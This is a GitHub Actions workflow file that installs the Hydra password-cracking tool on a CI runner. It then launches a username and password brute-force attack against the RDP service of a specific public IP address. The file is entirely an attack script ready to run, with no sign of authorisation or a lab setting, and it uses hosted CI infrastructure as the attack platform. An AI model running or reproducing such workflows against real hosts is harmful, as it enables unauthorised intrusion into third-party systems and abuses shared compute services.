name: Dev-3
on:
  workflow_dispatch:

jobs:
  Hydra:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2         
      - name: Install Dependencies
        run: sudo apt-get install hydra-gtk
      - name: Hydra
        run: |
         hydra -V -f -L /root/Desktop/user.txt -P /root/Desktop/dict.txt rdp://96.65.26.181
